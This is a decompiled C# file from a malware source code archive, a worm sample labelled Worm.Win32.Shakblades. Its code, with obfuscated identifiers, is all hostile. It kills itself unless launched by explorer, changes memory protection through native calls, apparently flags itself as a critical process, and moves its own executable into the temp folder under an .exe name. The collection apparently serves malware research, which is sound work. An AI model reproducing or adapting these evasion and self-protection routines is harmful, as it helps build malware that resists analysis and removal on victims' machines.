MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/Ѡኑ.cs

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.Ѡኑ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe

using System;
using System.Diagnostics;
using System.IO;
using System.Management;

namespace Ҧ߲๒ʽ໙ୄᴘ
{
  public static class Ѡኑ
  {
    public static void ᚷᦸᅏو()
    {
      if (ȩזြڹᡡỾỔው.\u17C1\u0F08ሜᅧᏀᒾ\u0EFB᪲)
        Ѡኑ.ᄊൎ();
      if (ȩזြڹᡡỾỔው.\u1943ᤖᤠᗎ && !Ѡኑ.\u0594ᢆ)
        Process.GetCurrentProcess().Kill();
      if (!ȩזြڹᡡỾỔው.\u1A98ᐖᅹ\u10CEጆ\u0AFFÕဥ)
        return;
      Ѡኑ.ᆹҞ();
    }

    public static void ᄊൎ()
    {
      try
      {
        IntPtr num = \u0667Ѹ.\u1395้ỿ((string) null);
        \u0667Ѹ.\u171F\u1B67ΨƱࠏ(num, 512U, 4U, out uint _);
        \u0667Ѹ.\u0CC4\u1C9B\u1BFD(num, (IntPtr) 512);
      }
      catch
      {
      }
    }

    public static void ᆹҞ()
    {
      try
      {
        int num = 1;
        \u0667Ѹ.ଠঅྼ(Process.GetCurrentProcess().Handle, 29, ref num, 4);
      }
      catch
      {
      }
    }

    public static bool \u0594ᢆ
    {
      get
      {
        using (ManagementObject managementObject = new ManagementObject("win32_process.handle='" + Process.GetCurrentProcess().Id.ToString() + "'"))
        {
          managementObject.Get();
          return !(Process.GetProcessById(Convert.ToInt32(managementObject["ParentProcessId"])).ProcessName.ToLower() != "explorer");
        }
      }
    }

    public static void \u1C59ḩฅ්Ꮱ()
    {
      try
      {
        string tempFileName = Path.GetTempFileName();
        File.Delete(tempFileName);
        string destFileName = tempFileName.Replace(".tmp", ".exe");
        File.Move(Process.GetCurrentProcess().MainModule.FileName, destFileName);
      }
      catch
      {
      }
    }
  }
}